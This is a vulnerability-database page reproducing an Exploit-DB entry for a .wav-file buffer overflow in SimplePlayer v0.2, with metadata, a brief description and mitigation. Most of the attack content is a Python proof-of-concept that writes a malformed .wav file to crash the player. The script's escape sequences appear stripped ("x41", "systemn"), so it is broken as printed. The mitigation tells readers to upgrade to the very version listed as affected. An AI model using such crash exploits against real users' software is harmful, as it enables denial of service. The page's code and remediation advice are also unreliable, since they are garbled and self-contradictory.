header-logo
Suggest Exploit
vendor:
SimplePlayer
by:
mr_me
7.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: SimplePlayer
Affected Version From: v0.2
Affected Version To: v0.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:simpleplayer:simpleplayer:0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2009

SimplePlayer v0.2 0day (.wav) overflow DOS Exploit

A buffer overflow vulnerability exists in SimplePlayer v0.2 when a specially crafted .wav file is opened. This can be exploited to cause a denial of service condition when the application crashes.

Mitigation:

Upgrade to the latest version of SimplePlayer v0.2
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Title: SimplePlayer v0.2 0day (.wav) overflow DOS Exploit
# Found by: mr_me (seeleymagic [at] hotmail [dot] com)
# Greetz to: Corelan Security Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT
# Tested on: Windows XP SP3
# Happy New Year!
#
# POC:

crash = ("x41" * 36000);     # overwrite the buffer at 262 bytes 
try: 
     file = open('mr_me_dos.wav','w'); 
     file.write(crash); 
     file.close();
     print "[+] Created mr_me_dos.wav file" 
except: 
     print "[-] Error cant write file to systemn";

Navigation

Suggest Exploit

Services By CQR